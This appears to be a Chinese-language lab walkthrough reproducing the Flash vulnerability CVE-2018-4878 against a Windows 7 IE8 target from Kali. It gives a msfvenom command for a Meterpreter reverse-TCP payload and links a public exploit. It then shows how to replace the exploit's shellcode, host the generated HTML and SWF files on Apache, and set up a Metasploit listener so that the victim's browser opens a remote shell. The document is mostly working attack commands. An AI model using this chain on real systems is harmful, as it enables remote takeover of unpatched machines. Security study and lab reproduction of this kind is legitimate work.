Flash 0day漏洞复现 CVE-2018-4878
一.环境搭建
攻击机:kali ip:192.168.43.79
靶机:windows7旗舰版 IE8 adobe flash player 28.0.0.137
1.adobe flash player 28.0.0.137 安装
百度adobe flash player for ie 28 进行下载,双击运行安装
查看版本方法:百度视频,随便点击一个视频,右键
2.下载exp,链接:https://github.com/anbai-inc/CVE-2018-4878
二.开始复现漏洞
1.利用把exp放到kali的桌面
2.msf生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.79 LPORT=6666 -f py
3.复制生成的shellcode,把exp里面的shellcode换成自己生成的
4.这里需要修改下大佬的脚本把Ture改成False
5.设置生成的路径
6.运行exp,python cve-2018-4878.py,会在桌面生成2个文件
7.开启apache服务
service apache2 start
8.查看是否开启成功
service apache2 status
9.把生成的2个文件移动到网站目录
cp index2.html /var/www/html/index2.html
cp exploit.swf /var/www/html/exploit.swf
cd /var/www/html/
ls
10.打开msf进行监听
msfconsole
use exploit/multi/handler
set LHOST 192.168.43.79
set LPORT 6666
set payload windows/meterpreter/reverse_tcp
查看设置是否有错,show options
exploit运行
11.打开靶机,利用IE访问kali的网站,http://192.168.43.79/index2.html
12.返回kali就可以看到成功的返回了一个会话sessions
13.当靶机关掉IE后反弹的session也会跟着断掉
感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!